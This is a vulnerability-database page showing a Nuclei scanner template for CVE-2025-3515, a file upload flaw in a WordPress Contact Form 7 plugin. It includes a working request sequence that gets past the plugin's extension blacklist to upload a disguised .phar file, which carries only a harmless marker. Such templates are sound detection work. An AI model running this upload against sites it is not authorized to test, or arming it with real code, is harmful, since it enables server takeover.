Lucene search
K

Contact Form 7 Drag and Drop Multiple File Upload - Arbitrary File Upload

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 39 Views

Contact Form 7 Drag and Drop Multi File Upload plugin allows arbitrary uploads up to 1.3.8.9, risking remote code execution.

Related
Refs
Code
id: CVE-2025-3515

info:
  name: Contact Form 7 Drag and Drop Multiple File Upload - Arbitrary File Upload
  author: hnd3884
  severity: high
  description: |
    The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in all versions up to, and including, 1.3.8.9. This makes it possible for unauthenticated attackers to bypass the plugin's blacklist and upload .phar or other dangerous file types on the affected site's server, which may make remote code execution possible on the servers that are configured to handle .phar files as executable PHP scripts, particularly in default Apache+mod_php configurations where the file extension is not strictly validated before being passed to the PHP interpreter.
  impact: |
    Unauthenticated attackers can upload dangerous file types like .phar by bypassing the blacklist, potentially achieving remote code execution on servers with default Apache+mod_php configurations.
  remediation: |
    Upgrade Contact Form 7 Drag and Drop Multiple File Upload plugin to version 1.3.9.0 or later that properly validates file extensions.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-3515
    - https://plugins.trac.wordpress.org/changeset/3310153/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e1298242-61d2-495e-bae7-96b5e12bd03d
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2025-3515
    cwe-id: CWE-434
    epss-score: 0.0509
    epss-percentile: 0.91316
    cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: codedropz
    product: drag_and_drop_multiple_file_upload_contact_form_7
    publicwww-query: "wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/"
  tags: cve,cve2025,wordpress,wp,contact-form-7,file-upload,intrusive,vkev,vuln

variables:
  phar_marker: "CVE-2025-3515-{{rand_base(8)}}"
  phar_file: "{{rand_base(5)}}"

flow: |
  http('fetch_upload_name') && http('upload_file') && http('fetch_phar_file') || http('version_check')

http:
  - id: fetch_upload_name
    method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/contact/"
      - "{{BaseURL}}/contact-us/"
      - "{{BaseURL}}/submit/"
      - "{{BaseURL}}/support/"
      - "{{BaseURL}}/form/"
      - "{{BaseURL}}/get-in-touch/"

    stop-at-first-match: true

    matchers:
      - type: word
        part: body
        words:
          - "wpcf7-drag-n-drop-file"
        internal: true

    extractors:
      - type: regex
        name: upload_name
        group: 1
        regex:
          - '<input.+?class=".+?wpcf7-drag-n-drop-file d-none.+?".+?data-name="(.+?)"'
        internal: true

      - type: regex
        name: nonce
        group: 1
        regex:
          - '"ajax_nonce":"([a-f0-9]{10,})"'
        internal: true

      - type: regex
        name: form_id
        group: 1
        regex:
          - '<input.+?class=".+?wpcf7-drag-n-drop-file d-none.+?".+?data-id="([0-9]+?)"'
        internal: true

  - id: upload_file

    method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyvcxCgWuFH6hBJi4
    body: |
      ------WebKitFormBoundaryyvcxCgWuFH6hBJi4
      Content-Disposition: form-data; name="action"

      dnd_codedropz_upload
      ------WebKitFormBoundaryyvcxCgWuFH6hBJi4
      Content-Disposition: form-data; name="type"

      drop
      ------WebKitFormBoundaryyvcxCgWuFH6hBJi4
      Content-Disposition: form-data; name="security"

      {{nonce}}
      ------WebKitFormBoundaryyvcxCgWuFH6hBJi4
      Content-Disposition: form-data; name="form_id"

      {{form_id}}
      ------WebKitFormBoundaryyvcxCgWuFH6hBJi4
      Content-Disposition: form-data; name="upload_name"

      {{upload_name}}
      ------WebKitFormBoundaryyvcxCgWuFH6hBJi4
      Content-Disposition: form-data; name="upload_folder"

      {{randstr}}
      ------WebKitFormBoundaryyvcxCgWuFH6hBJi4
      Content-Disposition: form-data; name="upload-file"; filename="{{phar_file}}.&#112;har"
      Content-Type: image/png

      {{phar_marker}}
      ------WebKitFormBoundaryyvcxCgWuFH6hBJi4--

    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
        internal: true

    extractors:
      - type: json
        name: uploaded_file
        json:
          - ".data.file"
        internal: true

  - id: fetch_phar_file
    method: GET
    path:
      - "{{RootURL}}/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{uploaded_file}}"

    matchers:
      - type: word
        part: body
        words:
          - "{{phar_marker}}"

  - id: version_check
    method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Drag and Drop Multiple File Upload"
          - "Stable tag:"
        condition: and

      - type: dsl
        dsl:
          - compare_versions(version, '<= 1.3.8.9')

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "Stable tag:\\s*([0-9.]+)"
        internal: true

      - type: regex
        group: 1
        regex:
          - "Stable tag:\\s*([0-9.]+)"
# digest: 4a0a00473045022023ae7ec395fec050395d0f65f0a7a53215732d116826dbde9613db53fdfb2700022100b67fd185931f3ca8d2dd80ae870c92ebce0603ffac70258f644d287cfec13679:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 3.18.1 - 9.8
EPSS0.0509
SSVC
39